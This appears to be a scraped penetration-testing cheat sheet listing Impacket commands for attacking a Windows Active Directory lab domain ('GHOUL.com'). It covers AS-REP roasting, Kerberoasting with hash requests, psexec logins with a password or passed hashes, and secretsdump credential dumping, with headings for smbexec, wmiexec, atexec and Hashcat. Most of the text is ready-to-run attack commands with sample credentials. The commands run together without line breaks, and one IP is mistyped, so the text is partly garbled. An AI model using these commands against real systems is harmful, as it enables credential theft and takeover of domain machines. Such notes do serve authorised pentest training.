Impacket
ASREP Roasting : Unprivileged accounts on the windows domain
impacket GetNPUsers.py GHOUL.com/ -dc-ip 192.168.0.10 -no-pass -usersfile /users.txtGetting User account hashes with compromised SPN user on the AD
impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10 -requestImpacket psexec
impacket-psexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10impacket-secretsdump GHOUL.com/ghoul@"Hang@123"@192.16.0.10impacket-psexec GHOUL.com/ghoul@192.168.0.10 -hashes <hash:hash>impacket-psexec ghoul:"Hang@123"@192.168.0.10Impacket-smbexec & Impacket-wmiexec
Impacket-atexec : Directly pass commands on the targeted server
Lookup sid to list potenial users on the targeted domain
Services execution on the targeted domain

SMBclient over Impacket
HashcatLast updated